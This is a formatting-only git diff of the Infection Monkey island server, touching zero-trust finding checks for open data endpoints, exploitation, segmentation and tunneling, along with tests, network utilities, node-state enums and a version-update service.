a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py index 2ecd42b52..e4accdff7 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py @@ -4,15 +4,17 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from common.common_consts.network_consts import ES_SERVICE from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) -HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] -POSTGRESQL_SERVER_SERVICE_NAME = 'PostgreSQL' +HTTP_SERVERS_SERVICES_NAMES = ["tcp-80"] +POSTGRESQL_SERVER_SERVICE_NAME = "PostgreSQL" def check_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] - current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) + current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]) found_http_server_status = zero_trust_consts.STATUS_PASSED found_elastic_search_server = zero_trust_consts.STATUS_PASSED found_postgresql_server = zero_trust_consts.STATUS_PASSED @@ -21,60 +23,77 @@ def check_open_data_endpoints(telemetry_json): Event.create_event( title="Scan Telemetry", message="Monkey on {} tried to perform a network scan, the target was {}.".format( - current_monkey.hostname, - telemetry_json["data"]["machine"]["ip_addr"]), + current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"] + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=telemetry_json["timestamp"] + timestamp=telemetry_json["timestamp"], ) ] for service_name, service_data in list(services.items()): - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Scanned service: {}.".format(service_name), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Scanned service: {}.".format(service_name), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name in HTTP_SERVERS_SERVICES_NAMES: found_http_server_status = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name == ES_SERVICE: found_elastic_search_server = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) if service_name == POSTGRESQL_SERVER_SERVICE_NAME: found_postgresql_server = zero_trust_consts.STATUS_FAILED - events.append(Event.create_event( - title="Scan telemetry analysis", - message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( - service_data["display_name"], - telemetry_json["data"]["machine"]["ip_addr"], - json.dumps(service_data) - ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK - )) + events.append( + Event.create_event( + title="Scan telemetry analysis", + message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( + service_data["display_name"], + telemetry_json["data"]["machine"]["ip_addr"], + json.dumps(service_data), + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - status=found_http_server_status, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, + status=found_http_server_status, + events=events, + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, - status=found_elastic_search_server, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, + status=found_elastic_search_server, + events=events, + ) - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL, - status=found_postgresql_server, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL, + status=found_postgresql_server, + events=events, + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(events) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py index 291348467..2a5c45613 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/known_anti_viruses.py @@ -83,5 +83,5 @@ ANTI_VIRUS_KNOWN_PROCESS_NAMES = [ "gc-fastpath.exe", "gc-enforcement-channel.exe", "gc-enforcement-agent.exe", - "gc-agent-ui.exe" + "gc-agent-ui.exe", ] diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py index d6813259c..9bf0f5de6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py @@ -1,6 +1,8 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp): @@ -8,11 +10,10 @@ def check_machine_exploited(current_monkey, exploit_successful, exploiter, targe Event.create_event( title="Exploit attempt", message="Monkey on {} attempted to exploit {} using {}.".format( - current_monkey.hostname, - target_ip, - exploiter), + current_monkey.hostname, target_ip, exploiter + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=timestamp + timestamp=timestamp, ) ] status = zero_trust_consts.STATUS_PASSED @@ -21,15 +22,16 @@ def check_machine_exploited(current_monkey, exploit_successful, exploiter, targe Event.create_event( title="Exploit success!", message="Monkey on {} successfully exploited {} using {}.".format( - current_monkey.hostname, - target_ip, - exploiter), + current_monkey.hostname, target_ip, exploiter + ), event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=timestamp) + timestamp=timestamp, + ) ) status = zero_trust_consts.STATUS_FAILED - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, - events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(events) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py index d5a56b36d..acc3e6bfa 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py @@ -5,15 +5,22 @@ from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_if_in_subnet, get_ip_in_src_and_not_in_dst from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event -from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.configuration.utils import ( + get_config_network_segments_as_subnet_groups, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) -SEGMENTATION_DONE_EVENT_TEXT = "Monkey on {hostname} is done attempting cross-segment communications " \ - "from `{src_seg}` segments to `{dst_seg}` segments." +SEGMENTATION_DONE_EVENT_TEXT = ( + "Monkey on {hostname} is done attempting cross-segment communications " + "from `{src_seg}` segments to `{dst_seg}` segments." +) -SEGMENTATION_VIOLATION_EVENT_TEXT = \ - "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " \ +SEGMENTATION_VIOLATION_EVENT_TEXT = ( + "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) " "managed to communicate cross segment to {target_ip} (in segment {target_seg})." +) def check_segmentation_violation(current_monkey, target_ip): @@ -25,15 +32,19 @@ def check_segmentation_violation(current_monkey, target_ip): source_subnet = subnet_pair[0] target_subnet = subnet_pair[1] if is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet): - event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) + event = get_segmentation_violation_event( + current_monkey, source_subnet, target_ip, target_subnet + ) MonkeyZTFindingService.create_or_add_to_existing( test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, - events=[event] + events=[event], ) -def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str) -> bool: +def is_segmentation_violation( + current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str +) -> bool: """ Checks is a specific communication is a segmentation violation. :param current_monkey: The source monkey which originated the communication. @@ -49,9 +60,8 @@ def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_sub if target_subnet_range.is_in_range(str(target_ip)): cross_segment_ip = get_ip_in_src_and_not_in_dst( - current_monkey.ip_addresses, - source_subnet_range, - target_subnet_range) + current_monkey.ip_addresses, source_subnet_range, target_subnet_range + ) return cross_segment_ip is not None @@ -61,17 +71,21 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t title="Segmentation event", message=SEGMENTATION_VIOLATION_EVENT_TEXT.format( hostname=current_monkey.hostname, - source_ip=get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)), + source_ip=get_ip_if_in_subnet( + current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet) + ), source_seg=source_subnet, target_ip=target_ip, - target_seg=target_subnet + target_seg=target_subnet, ), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) def check_passed_findings_for_unreached_segments(current_monkey): - flat_all_subnets = [item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist] + flat_all_subnets = [ + item for sublist in get_config_network_segments_as_subnet_groups() for item in sublist + ] create_or_add_findings_for_all_pairs(flat_all_subnets, current_monkey) @@ -79,7 +93,10 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): # Filter the subnets that this monkey is part of. this_monkey_subnets = [] for subnet in all_subnets: - if get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) is not None: + if ( + get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet)) + is not None + ): this_monkey_subnets.append(subnet) # Get all the other subnets. @@ -93,7 +110,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): MonkeyZTFindingService.create_or_add_to_existing( status=zero_trust_consts.STATUS_PASSED, events=[get_segmentation_done_event(current_monkey, subnet_pair)], - test=zero_trust_consts.TEST_SEGMENTATION + test=zero_trust_consts.TEST_SEGMENTATION, ) @@ -101,8 +118,7 @@ def get_segmentation_done_event(current_monkey, subnet_pair): return Event.create_event( title="Segmentation test done", message=SEGMENTATION_DONE_EVENT_TEXT.format( - hostname=current_monkey.hostname, - src_seg=subnet_pair[0], - dst_seg=subnet_pair[1]), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1] + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py index ca58549d1..aa67a5175 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py @@ -4,8 +4,12 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding -from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import create_or_add_findings_for_all_pairs -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.telemetry.zero_trust_checks.segmentation import ( + create_or_add_findings_for_all_pairs, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) FIRST_SUBNET = "1.1.1.1" SECOND_SUBNET = "2.2.2.0/24" @@ -13,13 +17,10 @@ THIRD_SUBNET = "3.3.3.3-3.3.3.200" class TestSegmentationChecks: - def test_create_findings_for_all_done_pairs(self): all_subnets = [FIRST_SUBNET, SECOND_SUBNET, THIRD_SUBNET] - monkey = Monkey( - guid=str(uuid.uuid4()), - ip_addresses=[FIRST_SUBNET]) + monkey = Monkey(guid=str(uuid.uuid4()), ip_addresses=[FIRST_SUBNET]) # no findings assert len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 0 @@ -28,8 +29,9 @@ class TestSegmentationChecks: create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_PASSED) + zt_seg_findings = Finding.objects( + test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED + ) # Assert that there's only one finding with multiple events (one for each subnet) assert len(zt_seg_findings) == 1 @@ -39,17 +41,23 @@ class TestSegmentationChecks: MonkeyZTFindingService.create_or_add_to_existing( status=zero_trust_consts.STATUS_FAILED, test=zero_trust_consts.TEST_SEGMENTATION, - events=[Event.create_event(title="sdf", - message="asd", - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] + events=[ + Event.create_event( + title="sdf", + message="asd", + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) + ], ) - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_PASSED) + zt_seg_findings = Finding.objects( + test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED + ) assert len(zt_seg_findings) == 1 - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED) + zt_seg_findings = Finding.objects( + test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED + ) assert len(zt_seg_findings) == 1 zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py index 4b755be98..092fd67e2 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py @@ -2,23 +2,31 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_tunneling_violation(tunnel_telemetry_json): - if tunnel_telemetry_json['data']['proxy'] is not None: + if tunnel_telemetry_json["data"]["proxy"] is not None: # Monkey is tunneling, create findings tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json) - current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid']) - tunneling_events = [Event.create_event( - title="Tunneling event", - message="Monkey on {hostname} tunneled traffic through {proxy}.".format( - hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=tunnel_telemetry_json['timestamp'] - )] + current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json["monkey_guid"]) + tunneling_events = [ + Event.create_event( + title="Tunneling event", + message="Monkey on {hostname} tunneled traffic through {proxy}.".format( + hostname=current_monkey.hostname, proxy=tunnel_host_ip + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + timestamp=tunnel_telemetry_json["timestamp"], + ) + ] - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_TUNNELING, - status=zero_trust_consts.STATUS_FAILED, events=tunneling_events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, + events=tunneling_events, + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(tunneling_events) diff --git a/monkey/monkey_island/cc/services/tests/reporting/test_report.py b/monkey/monkey_island/cc/services/tests/reporting/test_report.py index cc0ea321e..6cdc9befd 100644 --- a/monkey/monkey_island/cc/services/tests/reporting/test_report.py +++ b/monkey/monkey_island/cc/services/tests/reporting/test_report.py @@ -39,8 +39,8 @@ EXPLOIT_TELEMETRY_TELEM = { "ntlm_hash": NT_HASH, } } - } - } + }, + }, } @@ -56,7 +56,7 @@ SYSTEM_INFO_TELEMETRY_TELEM = { "ntlm_hash": NT_HASH, } } - } + }, } NO_CREDS_TELEMETRY_TELEM = { @@ -68,8 +68,8 @@ NO_CREDS_TELEMETRY_TELEM = { "ip_addr": VICTIM_IP, "domain_name": VICTIM_DOMAIN_NAME, }, - "info": {"credentials": {}} - } + "info": {"credentials": {}}, + }, } MONKEY_TELEM = {"_id": TELEM_ID["monkey"], "guid": MONKEY_GUID, "hostname": HOSTNAME} diff --git a/monkey/monkey_island/cc/services/tests/test_config.py b/monkey/monkey_island/cc/services/tests/test_config.py index efc04ed89..c43a13be9 100644 --- a/monkey/monkey_island/cc/services/tests/test_config.py +++ b/monkey/monkey_island/cc/services/tests/test_config.py @@ -12,8 +12,7 @@ PORT = 9999 @pytest.fixture def config(monkeypatch): - monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", - lambda: IPS) + monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", lambda: IPS) monkeypatch.setattr(Environment, "_ISLAND_PORT", PORT) config = ConfigService.get_default_config(True) return config @@ -22,12 +21,10 @@ def config(monkeypatch): def test_set_server_ips_in_config_command_servers(config): ConfigService.set_server_ips_in_config(config) expected_config_command_servers = [f"{ip}:{PORT}" for ip in IPS] - assert config["internal"]["island_server"]["command_servers"] ==\ - expected_config_command_servers + assert config["internal"]["island_server"]["command_servers"] == expected_config_command_servers def test_set_server_ips_in_config_current_server(config): ConfigService.set_server_ips_in_config(config) expected_config_current_server = f"{IPS[0]}:{PORT}" - assert config["internal"]["island_server"]["current_server"] ==\ - expected_config_current_server + assert config["internal"]["island_server"]["current_server"] == expected_config_current_server diff --git a/monkey/monkey_island/cc/services/utils/network_utils.py b/monkey/monkey_island/cc/services/utils/network_utils.py index cd4f6c4a1..ba3c76939 100644 --- a/monkey/monkey_island/cc/services/utils/network_utils.py +++ b/monkey/monkey_island/cc/services/utils/network_utils.py @@ -9,13 +9,16 @@ from typing import List from netifaces import AF_INET, ifaddresses, interfaces from ring import lru -__author__ = 'Barak' +__author__ = "Barak" # Local ips function if sys.platform == "win32": + def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] + + else: import fcntl @@ -28,12 +31,15 @@ else: max_possible = 8 # initial value while True: struct_bytes = max_possible * struct_size - names = array.array('B', '\0' * struct_bytes) - outbytes = struct.unpack('iL', fcntl.ioctl( - s.fileno(), - 0x8912, # SIOCGIFCONF - struct.pack('iL', struct_bytes, names.buffer_info()[0]) - ))[0] + names = array.array("B", "\0" * struct_bytes) + outbytes = struct.unpack( + "iL", + fcntl.ioctl( + s.fileno(), + 0x8912, # SIOCGIFCONF + struct.pack("iL", struct_bytes, names.buffer_info()[0]), + ), + )[0] if outbytes == struct_bytes: max_possible *= 2 else: @@ -41,8 +47,8 @@ else: namestr = names.tostring() for i in range(0, outbytes, struct_size): - addr = socket.inet_ntoa(namestr[i + 20:i + 24]) - if not addr.startswith('127'): + addr = socket.inet_ntoa(namestr[i + 20 : i + 24]) + if not addr.startswith("127"): result.append(addr) # name of interface is (namestr[i:i+16].split('\0', 1)[0] finally: @@ -50,7 +56,7 @@ else: def is_local_ips(ips: List) -> bool: - filtered_local_ips = [ip for ip in local_ip_addresses() if not ip.startswith('169.254')] + filtered_local_ips = [ip for ip in local_ip_addresses() if not ip.startswith("169.254")] return collections.Counter(ips) == collections.Counter(filtered_local_ips) @@ -63,7 +69,7 @@ def local_ip_addresses(): ip_list = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - ip_list.extend([link['addr'] for link in addresses if link['addr'] != '127.0.0.1']) + ip_list.extend([link["addr"] for link in addresses if link["addr"] != "127.0.0.1"]) return ip_list @@ -78,10 +84,9 @@ def get_subnets(): addresses = ifaddresses(interface).get(AF_INET, []) subnets.extend( [ - ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network - for link - in addresses - if link['addr'] != '127.0.0.1' + ipaddress.ip_interface(link["addr"] + "/" + link["netmask"]).network + for link in addresses + if link["addr"] != "127.0.0.1" ] ) return subnets diff --git a/monkey/monkey_island/cc/services/utils/node_states.py b/monkey/monkey_island/cc/services/utils/node_states.py index 3b7e48c65..bf5f2211a 100644 --- a/monkey/monkey_island/cc/services/utils/node_states.py +++ b/monkey/monkey_island/cc/services/utils/node_states.py @@ -6,40 +6,46 @@ from typing import List class NodeStates(Enum): - CLEAN_UNKNOWN = 'clean_unknown' - CLEAN_LINUX = 'clean_linux' - CLEAN_WINDOWS = 'clean_windows' - EXPLOITED_LINUX = 'exploited_linux' - EXPLOITED_WINDOWS = 'exploited_windows' - ISLAND = 'island' - ISLAND_MONKEY_LINUX = 'island_monkey_linux' - ISLAND_MONKEY_LINUX_RUNNING = 'island_monkey_linux_running' - ISLAND_MONKEY_LINUX_STARTING = 'island_monkey_linux_starting' - ISLAND_MONKEY_WINDOWS = 'island_monkey_windows' - ISLAND_MONKEY_WINDOWS_RUNNING = 'island_monkey_windows_running' - ISLAND_MONKEY_WINDOWS_STARTING = 'island_monkey_windows_starting' - MANUAL_LINUX = 'manual_linux' - MANUAL_LINUX_RUNNING = 'manual_linux_running' - MANUAL_WINDOWS = 'manual_windows' - MANUAL_WINDOWS_RUNNING = 'manual_windows_running' - MONKEY_LINUX = 'monkey_linux' - MONKEY_LINUX_RUNNING = 'monkey_linux_running' - MONKEY_WINDOWS = 'monkey_windows' - MONKEY_WINDOWS_RUNNING = 'monkey_windows_running' - MONKEY_WINDOWS_STARTING = 'monkey_windows_starting' - MONKEY_LINUX_STARTING = 'monkey_linux_starting' - MONKEY_WINDOWS_OLD = 'monkey_windows_old' - MONKEY_LINUX_OLD = 'monkey_linux_old' + CLEAN_UNKNOWN = "clean_unknown" + CLEAN_LINUX = "clean_linux" + CLEAN_WINDOWS = "clean_windows" + EXPLOITED_LINUX = "exploited_linux" + EXPLOITED_WINDOWS = "exploited_windows" + ISLAND = "island" + ISLAND_MONKEY_LINUX = "island_monkey_linux" + ISLAND_MONKEY_LINUX_RUNNING = "island_monkey_linux_running" + ISLAND_MONKEY_LINUX_STARTING = "island_monkey_linux_starting" + ISLAND_MONKEY_WINDOWS = "island_monkey_windows" + ISLAND_MONKEY_WINDOWS_RUNNING = "island_monkey_windows_running" + ISLAND_MONKEY_WINDOWS_STARTING = "island_monkey_windows_starting" + MANUAL_LINUX = "manual_linux" + MANUAL_LINUX_RUNNING = "manual_linux_running" + MANUAL_WINDOWS = "manual_windows" + MANUAL_WINDOWS_RUNNING = "manual_windows_running" + MONKEY_LINUX = "monkey_linux" + MONKEY_LINUX_RUNNING = "monkey_linux_running" + MONKEY_WINDOWS = "monkey_windows" + MONKEY_WINDOWS_RUNNING = "monkey_windows_running" + MONKEY_WINDOWS_STARTING = "monkey_windows_starting" + MONKEY_LINUX_STARTING = "monkey_linux_starting" + MONKEY_WINDOWS_OLD = "monkey_windows_old" + MONKEY_LINUX_OLD = "monkey_linux_old" @staticmethod def get_by_keywords(keywords: List) -> NodeStates: - potential_groups = [i for i in NodeStates if NodeStates._is_state_from_keywords(i, keywords)] + potential_groups = [ + i for i in NodeStates if NodeStates._is_state_from_keywords(i, keywords) + ] if len(potential_groups) > 1: - raise MultipleGroupsFoundException("Multiple groups contain provided keywords. " - "Manually build group string to ensure keyword order.") + raise MultipleGroupsFoundException( + "Multiple groups contain provided keywords. " + "Manually build group string to ensure keyword order." + ) elif len(potential_groups) == 0: - raise NoGroupsFoundException("No groups found with provided keywords. " - "Check for typos and make sure group codes want to find exists.") + raise NoGroupsFoundException( + "No groups found with provided keywords. " + "Check for typos and make sure group codes want to find exists." + ) return potential_groups[0] @staticmethod diff --git a/monkey/monkey_island/cc/services/utils/node_states_test.py b/monkey/monkey_island/cc/services/utils/node_states_test.py index 1204cb881..98df5455b 100644 --- a/monkey/monkey_island/cc/services/utils/node_states_test.py +++ b/monkey/monkey_island/cc/services/utils/node_states_test.py @@ -4,10 +4,17 @@ from monkey_island.cc.services.utils.node_states import NodeStates, NoGroupsFoun class TestNodeGroups(TestCase): - def test_get_group_by_keywords(self): - self.assertEqual(NodeStates.get_by_keywords(['island']), NodeStates.ISLAND) - self.assertEqual(NodeStates.get_by_keywords(['running', 'linux', 'monkey']), NodeStates.MONKEY_LINUX_RUNNING) - self.assertEqual(NodeStates.get_by_keywords(['monkey', 'linux', 'running']), NodeStates.MONKEY_LINUX_RUNNING) + self.assertEqual(NodeStates.get_by_keywords(["island"]), NodeStates.ISLAND) + self.assertEqual( + NodeStates.get_by_keywords(["running", "linux", "monkey"]), + NodeStates.MONKEY_LINUX_RUNNING, + ) + self.assertEqual( + NodeStates.get_by_keywords(["monkey", "linux", "running"]), + NodeStates.MONKEY_LINUX_RUNNING, + ) with self.assertRaises(NoGroupsFoundException): - NodeStates.get_by_keywords(['bogus', 'values', 'from', 'long', 'list', 'should', 'fail']) + NodeStates.get_by_keywords( + ["bogus", "values", "from", "long", "list", "should", "fail"] + ) diff --git a/monkey/monkey_island/cc/services/version_update.py b/monkey/monkey_island/cc/services/version_update.py index af47bf93a..530a7da0a 100644 --- a/monkey/monkey_island/cc/services/version_update.py +++ b/monkey/monkey_island/cc/services/version_update.py @@ -12,9 +12,9 @@ logger = logging.getLogger(__name__) class VersionUpdateService: - VERSION_SERVER_URL_PREF = 'https://updates.infectionmonkey.com' - VERSION_SERVER_CHECK_NEW_URL = VERSION_SERVER_URL_PREF + '?deployment=%s&monkey_version=%s' - VERSION_SERVER_DOWNLOAD_URL = VERSION_SERVER_CHECK_NEW_URL + '&is_download=true' + VERSION_SERVER_URL_PREF = "https://updates.infectionmonkey.com" + VERSION_SERVER_CHECK_NEW_URL = VERSION_SERVER_URL_PREF + "?deployment=%s&monkey_version=%s" + VERSION_SERVER_DOWNLOAD_URL = VERSION_SERVER_CHECK_NEW_URL + "&is_download=true" newer_version = None @@ -31,7 +31,7 @@ class VersionUpdateService: try: VersionUpdateService.newer_version = VersionUpdateService._check_new_version() except VersionServerConnectionError: - logger.info('Failed updating version number') + logger.info("Failed updating version number") return VersionUpdateService.newer_version @@ -41,7 +41,10 @@ class VersionUpdateService: Checks if newer monkey version is available :return: False if not, version in string format ('1.6.2') otherwise """ - url = VersionUpdateService.VERSION_SERVER_CHECK_NEW_URL % (env_singleton.env.get_deployment(), get_version()) + url = VersionUpdateService.VERSION_SERVER_CHECK_NEW_URL % ( + env_singleton.env.get_deployment(), + get_version(), + ) try: reply = requests.get(url, timeout=7) @@ -49,14 +52,17 @@ class VersionUpdateService: logger.info("Can't get latest monkey version, probably no connection to the internet.") raise VersionServerConnectionError - res = reply.json().get('newer_version', None) + res = reply.json().get("newer_version", None) if res is False: return res - [int(x) for x in res.split('.')] # raises value error if version is invalid format + [int(x) for x in res.split(".")] # raises value error if version is invalid format return res @staticmethod def get_download_link(): - return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % (env_singleton.env.get_deployment(), get_version()) + return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % ( + env_singleton.env.get_deployment(), + get_version(), + ) diff --git 